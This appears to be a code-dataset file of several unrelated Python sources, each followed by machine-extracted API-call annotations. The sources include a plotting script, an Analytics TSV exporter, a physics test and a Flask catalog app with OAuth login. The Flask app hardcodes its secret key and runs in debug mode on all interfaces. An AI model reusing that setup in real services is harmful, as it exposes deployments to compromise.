assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
| [
"mindmeld.components.Conversation"
] | [((1209, 1300), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1221, 1300), False, 'from mindmeld.components import Conversation\n'), ((1835, 1926), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1847, 1926), False, 'from mindmeld.components import Conversation\n'), ((2455, 2546), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (2467, 2546), False, 'from mindmeld.components import Conversation\n'), ((3273, 3364), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (3285, 3364), False, 'from mindmeld.components import Conversation\n')] |
import os,sys
import webbrowser
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.cm as cm
import matplotlib.pylab as plt
from matplotlib import ticker
plt.rcParams['font.family'] = 'monospace'
fig = plt.figure()
rect = fig.add_subplot(111, aspect='equal')
data0 = np.loadtxt('data0.dat', delimiter=',')
data1 = np.loadtxt('data1.dat', delimiter=',')
dense = np.loadtxt('dense.dat', delimiter=',')
ID = sys.argv[1]
X = np.arange(-2.0, 2.05, 0.05)
Y = np.arange(-2.0, 2.05, 0.05)
Xm, Ym = np.meshgrid(X, Y)
vmin, vmax = dense.min(), dense.max()
if vmin * vmax < 0:
vmin = -abs(max(-vmin, vmax))
vmax = +abs(max(-vmin, vmax))
cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower')
plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2])
plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2])
cb = plt.colorbar(cr, format='%+.1e')
cb.solids.set_edgecolor('face')
cb.set_ticks(ticker.LinearLocator(6))
cb.ax.tick_params(labelsize=12)
rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1)
rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1)
plt.xlim(X[0], X[-1])
plt.ylim(Y[0], Y[-1])
plt.xlabel("")
plt.ylabel("")
plt.grid(ls='dotted')
plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1)
plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1)
os.remove('dense.dat')
os.remove('data0.dat')
os.remove('data1.dat')
webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
| [
"matplotlib.pylab.xlim",
"matplotlib.pylab.grid",
"matplotlib.pylab.figure",
"matplotlib.use",
"matplotlib.pylab.contour",
"matplotlib.pylab.ylim",
"matplotlib.ticker.LinearLocator",
"matplotlib.pylab.xlabel",
"matplotlib.pylab.colorbar",
"os.remove",
"numpy.meshgrid",
"numpy.loadtxt",
"numpy.arange",
"matplotlib.pylab.ylabel"
] | [((69, 90), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (83, 90), False, 'import matplotlib\n'), ((228, 240), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (238, 240), True, 'import matplotlib.pylab as plt\n'), ((293, 331), 'numpy.loadtxt', 'np.loadtxt', (['"""data0.dat"""'], {'delimiter': '""","""'}), "('data0.dat', delimiter=',')\n", (303, 331), True, 'import numpy as np\n'), ((340, 378), 'numpy.loadtxt', 'np.loadtxt', (['"""data1.dat"""'], {'delimiter': '""","""'}), "('data1.dat', delimiter=',')\n", (350, 378), True, 'import numpy as np\n'), ((387, 425), 'numpy.loadtxt', 'np.loadtxt', (['"""dense.dat"""'], {'delimiter': '""","""'}), "('dense.dat', delimiter=',')\n", (397, 425), True, 'import numpy as np\n'), ((447, 474), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (456, 474), True, 'import numpy as np\n'), ((479, 506), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (488, 506), True, 'import numpy as np\n'), ((516, 533), 'numpy.meshgrid', 'np.meshgrid', (['X', 'Y'], {}), '(X, Y)\n', (527, 533), True, 'import numpy as np\n'), ((795, 894), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[-1, 1]', 'cmap': 'cm.bwr', 'linestyles': '"""dashed"""', 'linewidths': '[2, 2]'}), "(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed',\n linewidths=[2, 2])\n", (806, 894), True, 'import matplotlib.pylab as plt\n'), ((890, 985), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[0]', 'colors': '"""black"""', 'linestyles': '"""dashed"""', 'linewidths': '[2]'}), "(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed',\n linewidths=[2])\n", (901, 985), True, 'import matplotlib.pylab as plt\n'), ((987, 1019), 'matplotlib.pylab.colorbar', 'plt.colorbar', (['cr'], {'format': '"""%+.1e"""'}), "(cr, format='%+.1e')\n", (999, 1019), True, 'import matplotlib.pylab as plt\n'), ((1318, 1339), 'matplotlib.pylab.xlim', 'plt.xlim', (['X[0]', 'X[-1]'], {}), '(X[0], X[-1])\n', (1326, 1339), True, 'import matplotlib.pylab as plt\n'), ((1340, 1361), 'matplotlib.pylab.ylim', 'plt.ylim', (['Y[0]', 'Y[-1]'], {}), '(Y[0], Y[-1])\n', (1348, 1361), True, 'import matplotlib.pylab as plt\n'), ((1362, 1376), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (1372, 1376), True, 'import matplotlib.pylab as plt\n'), ((1377, 1391), 'matplotlib.pylab.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (1387, 1391), True, 'import matplotlib.pylab as plt\n'), ((1392, 1413), 'matplotlib.pylab.grid', 'plt.grid', ([], {'ls': '"""dotted"""'}), "(ls='dotted')\n", (1400, 1413), True, 'import matplotlib.pylab as plt\n'), ((1554, 1576), 'os.remove', 'os.remove', (['"""dense.dat"""'], {}), "('dense.dat')\n", (1563, 1576), False, 'import os, sys\n'), ((1577, 1599), 'os.remove', 'os.remove', (['"""data0.dat"""'], {}), "('data0.dat')\n", (1586, 1599), False, 'import os, sys\n'), ((1600, 1622), 'os.remove', 'os.remove', (['"""data1.dat"""'], {}), "('data1.dat')\n", (1609, 1622), False, 'import os, sys\n'), ((1065, 1088), 'matplotlib.ticker.LinearLocator', 'ticker.LinearLocator', (['(6)'], {}), '(6)\n', (1085, 1088), False, 'from matplotlib import ticker\n')] |
# coding=utf-8
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility to convert a Data Export API response into TSV.
This provides utilities to both print TSV files to the standard output
as well as directly to a file. This logic handles all the utf-8 conversion.
GetTsvFilePrinter: Returns an instantiated object to output to files.
GetTsvScreenPrinter: Returns an instantiated object to output to the screen.
UnicodeWriter(): Utf-8 encodes output.
ExportPrinter(): Converts the Data Export API response into tabular data.
"""
__author__ = 'api.nickm@ (<NAME>)'
import codecs
import csv
import StringIO
import sys
import types
# A list of special characters that need to be escaped.
SPECIAL_CHARS = ('+', '-', '/', '*', '=')
# TODO(nm): Test leading numbers.
def GetTsvFilePrinter(file_name):
"""Returns a ExportPrinter object to output to file_name.
Args:
file_name: string The name of the file to output to.
Returns:
The newly created ExportPrinter object.
"""
  my_handle = open(file_name, 'w')
writer = UnicodeWriter(my_handle, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvScreenPrinter():
  """Returns an ExportPrinter object that outputs to sys.stdout."""
writer = UnicodeWriter(sys.stdout, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvStringPrinter(f):
  """Returns an ExportPrinter object that outputs to the file object f."""
writer = UnicodeWriter(f, dialect='excel-tab')
return ExportPrinter(writer)
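# --- Usage sketch (not part of the original utility) ---------------------------
# Illustrative only: the typical flow is to obtain a printer and hand it the
# parsed API response dictionary, e.g.:
#
#   printer = GetTsvScreenPrinter()
#   printer.Output(results)   # `results` is the Data Export API response dict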
# Wrapper to output to utf-8. Taken mostly / directly from Python docs:
# http://docs.python.org/library/csv.html
class UnicodeWriter(object):
"""A CSV writer which uses the csv module to output csv compatible formats.
Will write rows to CSV file "f", which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds):
# Redirect output to a queue
self.queue = StringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
# pylint: disable=g-bad-name
def writerow(self, row):
"""Writes a CSV row.
Args:
row: list The row to write to the CSV output.
"""
self.writer.writerow([s.encode('utf-8') for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode('utf-8')
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
# pylint: disable=g-bad-name
def writerows(self, rows):
"""Writes rows for CSV output.
Args:
rows: list of rows to write.
"""
for row in rows:
self.writerow(row)
class ExportPrinter(object):
"""Utility class to output a the data feed as tabular data."""
def __init__(self, writer):
"""Initializes the class.
Args:
writer: Typically an instance of UnicodeWriter. The interface for this
          object provides two methods, writerow and writerows, which
          accept a list or a list of lists respectively and process them as
needed.
"""
self.writer = writer
def Output(self, results):
"""Outputs formatted rows of data retrieved from the Data Export API.
This uses the writer object to output the data in the Data Export API.
Args:
results: The response from the data export API.
"""
if not results.get('rows'):
self.writer.writerow('No Results found')
else:
self.OutputProfileName(results)
self.writer.writerow([])
self.OutputContainsSampledData(results)
self.writer.writerow([])
self.OutputQueryInfo(results)
self.writer.writerow([])
self.OutputHeaders(results)
self.OutputRows(results)
self.writer.writerow([])
self.OutputRowCounts(results)
self.OutputTotalsForAllResults(results)
def OutputProfileName(self, results):
"""Outputs the profile name along with the qurey."""
profile_name = ''
info = results.get('profileInfo')
if info:
profile_name = info.get('profileName')
self.writer.writerow(['Report For View (Profile): ', profile_name])
def OutputQueryInfo(self, results):
"""Outputs the query used."""
self.writer.writerow(['These query parameters were used:'])
query = results.get('query')
for key, value in query.iteritems():
if type(value) == types.ListType:
value = ','.join(value)
else:
value = str(value)
value = ExcelEscape(value)
self.writer.writerow([key, value])
def OutputContainsSampledData(self, results):
"""Outputs whether the resuls have been sampled."""
sampled_text = 'do not'
if results.get('containsSampledData'):
sampled_text = 'do'
row_text = 'These results %s contain sampled data.' % sampled_text
self.writer.writerow([row_text])
def OutputHeaders(self, results):
"""Outputs all the dimension and metric names in order."""
row = []
for header in results.get('columnHeaders'):
row.append(header.get('name'))
self.writer.writerow(row)
def OutputRows(self, results):
"""Outputs all the rows in the table."""
    # Escape any cell whose first character is special in Excel (e.g. '=').
for row in results.get('rows'):
out_row = []
for cell in row:
cell = ExcelEscape(cell)
out_row.append(cell)
self.writer.writerow(out_row)
def OutputRowCounts(self, results):
"""Outputs how many rows were returned vs rows that were matched."""
items = str(results.get('itemsPerPage'))
matched = str(results.get('totalResults'))
output = [
['Rows Returned', items],
['Rows Matched', matched]
]
self.writer.writerows(output)
def OutputTotalsForAllResults(self, results):
"""Outputs the totals for all results matched by the query.
This is not the sum of the values returned in the response.
This will align the metric totals in the same columns as
the headers are printed. The totals are stored as a dict, where the
key is the metric name and the value is the total. To align these
totals in the proper columns, a position index of the metric name
    and its position in the table is first created. Then the totals
are added by position to a row of empty strings.
Args:
results: API Response from Core Reporting API.
"""
# Create the metric position index.
metric_index = {}
headers = results.get('columnHeaders')
for index in range(0, len(headers)):
header = headers[index]
if header.get('columnType') == 'METRIC':
metric_index[header.get('name')] = index
# Create a row of empty strings the same length as the header.
row = [''] * len(headers)
# Use the position index to output the totals in the right columns.
totals = results.get('totalsForAllResults')
for metric_name, metric_total in totals.iteritems():
index = metric_index[metric_name]
row[index] = metric_total
self.writer.writerows([['Totals For All Rows Matched'], row])
def ExcelEscape(input_value):
"""Escapes the first character of a string if it is special in Excel.
Args:
input_value: string The value to escape.
Returns:
A string that has the first character escaped if it is special.
"""
if input_value and input_value[0] in SPECIAL_CHARS:
return "'" + input_value
return input_value
| [
"StringIO.StringIO",
"csv.writer",
"codecs.getincrementalencoder"
] | [((2455, 2474), 'StringIO.StringIO', 'StringIO.StringIO', ([], {}), '()\n', (2472, 2474), False, 'import StringIO\n'), ((2493, 2540), 'csv.writer', 'csv.writer', (['self.queue'], {'dialect': 'dialect'}), '(self.queue, dialect=dialect, **kwds)\n', (2503, 2540), False, 'import csv\n'), ((2580, 2618), 'codecs.getincrementalencoder', 'codecs.getincrementalencoder', (['encoding'], {}), '(encoding)\n', (2608, 2618), False, 'import codecs\n')] |
"""
test_pop_models.py
Author: <NAME>
Affiliation: UCLA
Created on: Fri Jul 15 15:23:11 PDT 2016
Description: Check that a GalaxyPopulation built from an fcoll SFRD matches one
    built from an equivalent user-supplied SFRD function and toy SED.
"""
import ares
import matplotlib.pyplot as pl
PB = ares.util.ParameterBundle
def test():
# Create a simple population
pars_1 = PB('pop:fcoll') + PB('sed:bpass')
pop_fcoll = ares.populations.GalaxyPopulation(**pars_1)
#pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1)
# Mimic the above population to check our different SFRD/SED techniques
sfrd_pars = {'pop_sfr_model': 'sfrd-func'}
sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD
sfrd_pars['pop_sfrd_units'] = 'internal'
sed = PB('sed:toy')
sed['pop_Nion'] = pop_fcoll.src.Nion
sed['pop_Nlw'] = pop_fcoll.src.Nlw
# pop_Ex?
sed['pop_ion_src_igm'] = False
sed['pop_heat_src_igm'] = False
pars_2 = sed + sfrd_pars
pop_sfrd = ares.populations.GalaxyPopulation(**pars_2)
assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD."
# Check the emissivities too
#print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \
# == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \
# "Error in photon luminosity density."
if __name__ == '__main__':
test()
| [
"ares.populations.GalaxyPopulation"
] | [((305, 348), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_1)\n', (338, 348), False, 'import ares\n'), ((877, 920), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_2)\n', (910, 920), False, 'import ares\n')] |
from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests
app = Flask(__name__)
# Retrieves client ID's and secrets from the json files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
.read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_secret']
# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Login handler
@app.route('/login')
def showLogin():
"""JSON API to view entire catalog Information."""
return render_template('login.html')
# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
"""
Retrieves provider to process oauth login.
params:(string) oauth provider
"""
if provider == 'google':
code = request.data
try:
# Upgrade auth code into credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json',
scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check for valid access token
access_token = credentials.access_token
url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
'access_token={}'.format(access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Access token error handling
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = ' application/json'
return response
# Store access token in session
login_session['provider'] = 'google'
login_session['access_token'] = access_token
login_session['gplus_id'] = credentials.id_token['sub']
# Get user info
userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
params = {'access_token': login_session['access_token'], 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = json.loads(answer.text)
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
elif provider == 'facebook':
access_token = request.data
url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
'fb_exchange_token&client_id={}&client_secret={}&' \
'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Strip expire tag from access token
access_token = result['access_token']
url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
'name,id,email,picture'.format(access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Get user info
data = result
login_session['access_token'] = access_token
login_session['provider'] = 'facebook'
login_session['username'] = data['name']
login_session['email'] = data['email']
login_session['picture'] = data['picture']['data']['url']
login_session['facebook_id'] = data['id']
# Checks if user exists in DB
if getUserID(login_session['email']) is not None:
login_session['user_id'] = getUserID(login_session['email'])
else:
createUser(login_session)
login_session['user_id'] = getUserID(login_session['email'])
# Stores token in session
user = session.query(User).filter_by(email=login_session['email']).first()
token = user.generate_auth_token(600)
login_session['token'] = token
output = ''
output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
output += '<img src="{}" '.format(login_session['picture'])
output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
'-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
flash('Now logged in as {}'.format(login_session['username']))
return output
def createUser(login_session):
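    """Creates a new User record from the fields stored in login_session."""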
newUser = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(newUser)
session.commit()
def getUserID(email):
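    """Returns the id of the User with the given email, or None if not found."""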
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
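    """Clears the OAuth data stored in login_session and redirects to the catalog."""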
if 'provider' in login_session:
if login_session['provider'] == 'google':
del login_session['gplus_id']
if login_session['provider'] == 'facebook':
del login_session['facebook_id']
del login_session['access_token']
del login_session['username']
del login_session['picture']
del login_session['email']
del login_session['token']
flash("You have been successfully logged out.")
return redirect(url_for('showCatalog'))
else:
flash("No user has been logged in.")
return redirect(url_for('showCatalog'))
# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
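    """JSON API to view entire catalog Information."""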
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
return jsonify(Categories=[c.serialize for c in categories],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
return jsonify(Categories=[itemCategory.serialize],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
itemCategory = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=itemCategory.id).first()
return jsonify(Category=[itemCategory.serialize],
Item=[item.serialize])
# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
if 'token' not in login_session:
return render_template('publiccatalog.html',
categories=categories, items=items)
else:
return render_template('catalog.html',
categories=categories, items=items)
# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategory.html',
items=items, category=itemCategory,
categories=categories)
else:
return render_template('category.html', items=items,
category=itemCategory, categories=categories)
# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
category = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=category.id).first()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategoryitem.html',
item=item, category=category,
categories=categories)
return render_template('categoryitem.html', item=item,
category=category, categories=categories)
# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
if 'token' not in login_session:
return redirect('/login')
categories = session.query(Category).all()
user = session.query(User).filter_by(email=login_session['email']).one()
if request.method == 'POST':
category = session.query(Category).filter_by(
name=request.form['category']).first()
newItem = Item(name=request.form['name'],
description=request.form['description'],
category_id=category.id, user_id=user.id)
session.add(newItem)
session.commit()
flash('New Item {} Successfully Added'.format(newItem.name))
return redirect(url_for('showCatalog'))
else:
return render_template('newcategoryitem.html', categories=categories)
# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
editedItem = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
categories = session.query(Category).all()
if user.id != editedItem.user_id:
flash('You are not authorized to edit {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=editedItem.name))
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
if request.form['description']:
editedItem.description = request.form['description']
if request.form['category']:
category = session.query(Category).filter_by(
name=request.form['category']).first()
editedItem.category_id = category.id
session.add(editedItem)
session.commit()
flash('Item Successfully Edited')
return redirect(url_for('showCategoryItem',
category=request.form['category'],
item=editedItem.name))
else:
return render_template('editcategoryitem.html',
category=categoryItem.name,
item=editedItem.name, categories=categories,
editedItem=editedItem)
# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
itemToDelete = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
if user.id != itemToDelete.user_id:
flash('You are not authorized to delete {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=itemToDelete.name))
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
flash('Item Successfully Deleted')
return redirect(url_for('showCatalog'))
else:
return render_template('deletecategoryitem.html',
category=categoryItem.name,
item=itemToDelete.name)
if __name__ == '__main__':
app.secret_key = 'N10kuN!'
app.debug = True
app.run(host='0.0.0.0', port=5000)
| [
"flask.render_template",
"sqlalchemy.orm.sessionmaker",
"json.loads",
"models.Item",
"flask.flash",
"flask.Flask",
"sqlalchemy.create_engine",
"json.dumps",
"oauth2client.client.flow_from_clientsecrets",
"requests.get",
"flask.url_for",
"flask.redirect",
"models.User",
"httplib2.Http",
"flask.jsonify"
] | [((448, 463), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (453, 463), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((905, 942), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///catalog.db"""'], {}), "('sqlite:///catalog.db')\n", (918, 942), False, 'from sqlalchemy import create_engine, asc\n'), ((984, 1009), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (996, 1009), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1154, 1183), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (1169, 1183), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((5104, 5212), 'models.User', 'User', ([], {'username': "login_session['username']", 'email': "login_session['email']", 'picture': "login_session['picture']"}), "(username=login_session['username'], email=login_session['email'],\n picture=login_session['picture'])\n", (5108, 5212), False, 'from models import Base, Category, Item, User\n'), ((6374, 6467), 'flask.jsonify', 'jsonify', ([], {'Categories': '[c.serialize for c in categories]', 'Items': '[i.serialize for i in items]'}), '(Categories=[c.serialize for c in categories], Items=[i.serialize for\n i in items])\n', (6381, 6467), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((6724, 6809), 'flask.jsonify', 'jsonify', ([], {'Categories': '[itemCategory.serialize]', 'Items': '[i.serialize for i in items]'}), '(Categories=[itemCategory.serialize], Items=[i.serialize for i in items]\n )\n', (6731, 6809), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7128, 7193), 'flask.jsonify', 'jsonify', ([], {'Category': '[itemCategory.serialize]', 'Item': '[item.serialize]'}), '(Category=[itemCategory.serialize], Item=[item.serialize])\n', (7135, 7193), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8953, 9046), 'flask.render_template', 'render_template', (['"""categoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('categoryitem.html', item=item, category=category,\n categories=categories)\n", (8968, 9046), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((2218, 2233), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (2231, 2233), False, 'import httplib2\n'), ((2937, 2978), 'requests.get', 'requests.get', (['userinfo_url'], {'params': 'params'}), '(userinfo_url, params=params)\n', (2949, 2978), False, 'import requests\n'), ((2994, 3017), 'json.loads', 'json.loads', (['answer.text'], {}), '(answer.text)\n', (3004, 3017), False, 'import json\n'), ((5957, 6004), 'flask.flash', 'flash', (['"""You have been successfully logged out."""'], {}), "('You have been successfully logged out.')\n", (5962, 6004), False, 'from flask import url_for, flash, make_response\n'), ((6071, 6107), 'flask.flash', 'flash', (['"""No user has been logged in."""'], {}), "('No user has been logged in.')\n", (6076, 6107), False, 'from flask import url_for, flash, make_response\n'), ((7483, 7556), 'flask.render_template', 'render_template', (['"""publiccatalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('publiccatalog.html', categories=categories, items=items)\n", (7498, 7556), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7613, 7680), 'flask.render_template', 'render_template', 
(['"""catalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('catalog.html', categories=categories, items=items)\n", (7628, 7680), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8068, 8169), 'flask.render_template', 'render_template', (['"""publiccategory.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('publiccategory.html', items=items, category=itemCategory,\n categories=categories)\n", (8083, 8169), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8253, 8348), 'flask.render_template', 'render_template', (['"""category.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('category.html', items=items, category=itemCategory,\n categories=categories)\n", (8268, 8348), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8784, 8883), 'flask.render_template', 'render_template', (['"""publiccategoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('publiccategoryitem.html', item=item, category=category,\n categories=categories)\n", (8799, 8883), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9229, 9247), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (9237, 9247), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9528, 9646), 'models.Item', 'Item', ([], {'name': "request.form['name']", 'description': "request.form['description']", 'category_id': 'category.id', 'user_id': 'user.id'}), "(name=request.form['name'], description=request.form['description'],\n category_id=category.id, user_id=user.id)\n", (9532, 9646), False, 'from models import Base, Category, Item, User\n'), ((9885, 9947), 'flask.render_template', 'render_template', (['"""newcategoryitem.html"""'], {'categories': 'categories'}), "('newcategoryitem.html', categories=categories)\n", (9900, 9947), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((10134, 10152), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (10142, 10152), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11183, 11216), 'flask.flash', 'flash', (['"""Item Successfully Edited"""'], {}), "('Item Successfully Edited')\n", (11188, 11216), False, 'from flask import url_for, flash, make_response\n'), ((11416, 11557), 'flask.render_template', 'render_template', (['"""editcategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name', 'categories': 